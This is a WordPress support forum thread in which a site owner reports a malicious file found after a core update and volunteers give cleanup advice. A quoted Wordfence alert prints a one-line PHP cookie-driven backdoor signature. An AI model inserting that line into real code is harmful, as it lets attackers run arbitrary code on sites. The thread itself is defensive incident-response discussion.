Malicious File After Updating WordPress to 4.7.2

That file is not a part of the WordPress install or uprade package. I would assume the worst – that the file is malicious and that your hosting account/personal machine/login credentials have been compromised. This is the standard support doc referred to in this case: https://codex.www.ads-software.com/FAQ_My_site_was_hacked . Then once your site is clean: https://codex.www.ads-software.com/Hardening_WordPress

if you look at the file, is there any indication where it might come from? Any comments at the top?

If all your sites are in the same hosting account, a hack of one could easily affect the others.

Hello+

@pidengmor (barnez), thank you for clarifying that it really is a malicious file. I do not think “my” hosting account/personal machine/login credentials have been compromised since none of these are on my hosting. All of these are my clients’ websites and each has their own individual accounts, with which ever host provider they prefer. They are not all hosted by the same hosting company. However, ALL got this malicious file AFTER the update to WordPress 4.7.2.

@sterndata, thank you for that suggestion… There is no indication as to where it might have come from (looking via WordFence), only “This file appears to be installed by a hacker to perform malicious activity”… Also, no – they are NOT on the same hosting account.

I am removing that file now…I simply find it VERY suspicious that I updated to the WordPress 4.7.2 and THEN ALL were hacked… I’m just wondering about that…?

Thanks, +ES

@evelynmsdesigngraphicscom

As suggested by @sterndata, it would be interesting to see what the file contains. It could be something as innocent as a plugin adding the file. Wordfence may just be flagging it as malicious as it shouldn’t be there. If it has lots of obfuscated code or dodgy links then it’s trouble. Are you able to check?

Hello+

I will take a look and see… I will post what I find.

Thank you.

Hi+

Looking at WordFence, the alert says:

File appears to be malicious: wp-comments-post.php

Filename: wp-comments-post.php
File type: Core
Issue first detected: 4 hours 32 mins ago.
Severity: Critical
Status New

This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);”. The infection type is: Backdoor:PHP/ddksk7.
**
However when I go to “see how the file has changed”, it says:

There are no differences between the original file and the file in the repository.
**

So…should I “restore the original version”? Or delete it entirely? (since it is not part of the WordPress install or upgrade package)

Thank you! +ES

delete it

Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are two.

Thank you Steve… I already have WordFence and BlogVault Security on the sites.

I am in via FTP and looking under “wp-content” which is where WordFence is stating the common.php is located

wp-content/common.php

But I do not see that common.php – so it is difficult to delete if I don’t see it via FTP… Any suggestions?

Thanks!

Okay, that was not supposed to be a link… just the letters “FTP”

If you have a suspicious file, it’s best to assume there are more.

Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are two.

Thank you